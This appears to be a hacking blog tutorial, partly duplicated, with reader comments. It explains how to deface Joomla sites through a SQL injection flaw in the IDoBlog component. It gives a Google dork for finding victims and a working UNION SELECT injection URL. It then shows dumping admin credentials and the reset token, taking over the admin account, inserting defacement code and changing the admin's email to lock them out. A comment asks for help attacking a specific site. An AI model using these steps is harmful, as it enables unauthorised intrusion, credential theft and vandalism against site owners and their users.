Introduction : Joomla! as Stable-Full Package is probably unhackable and
If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart from
official team that offer their solutions to improve Joomla.
That components and modules mede by that other developers are weak spots!
I hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!
Finding Exploit And Target : Those two steps could go in different order, depend what you find first target or exploit...
Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vulnrablity
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
Exploit can be separated in two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
This part looking for username and password from jos_users table
Testing Vulnerability
Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'
Go to:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally...
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable
Inject Target
Open reiluke SQLiHelper 2.7
In Target copy
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have
Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data
Let Dump username, email, password from Column Name jos153_users. Click on Dump Now
username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...
The easiest way to hack is to reset Admin password!
Admin Password Reset
Go to:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request
If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart from
official team that offer their solutions to improve Joomla.
That components and modules mede by that other developers are weak spots!
I hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!
Finding Exploit And Target : Those two steps could go in different order, depend what you find first target or exploit...
Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vulnrablity
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
Exploit can be separated in two parts:
Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)
Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
This part looking for username and password from jos_users table
Testing Vulnerability
Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'
Go to:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally...
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin
Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable
Inject Target
Open reiluke SQLiHelper 2.7
In Target copy
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have
Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data
Let Dump username, email, password from Column Name jos153_users. Click on Dump Now
username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI
Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...
The easiest way to hack is to reset Admin password!
Admin Password Reset
Go to:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request
Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:
Finding Token
To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users
username: admin
activation: 5482dd177624761a290224270fa55f1d
5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.
If you done everything ok, Rest your Password page will load. Enter your new password...
After that go to:
http://www.site.com/administrator/
Standard Joomla portal content management system
Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!
To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail
Share Links and Make this tutorial alive!!!
Cheers!
.jpg)
4 comments:
Good One
can not understand
Thanks for sharing, that’s gone into the long term memory bank
i will hack this site http://example.com but i can't hack it...
and i look
404 - Component not found
You may not be able to visit this page because of:
an out-of-date bookmark/favourite
a search engine that has an out-of-date listing for this site
a mistyped address
you have no access to this page
The requested resource was not found.
An error has occurred while processing your request.
Please try one of the following pages:
Home Page
If difficulties persist, please contact the System Administrator of this site and report the error below..
Component not found
so can you tell me how to hack this site
Post a Comment
If you're having issues, Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.
Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!
Thanks for reading,
Admin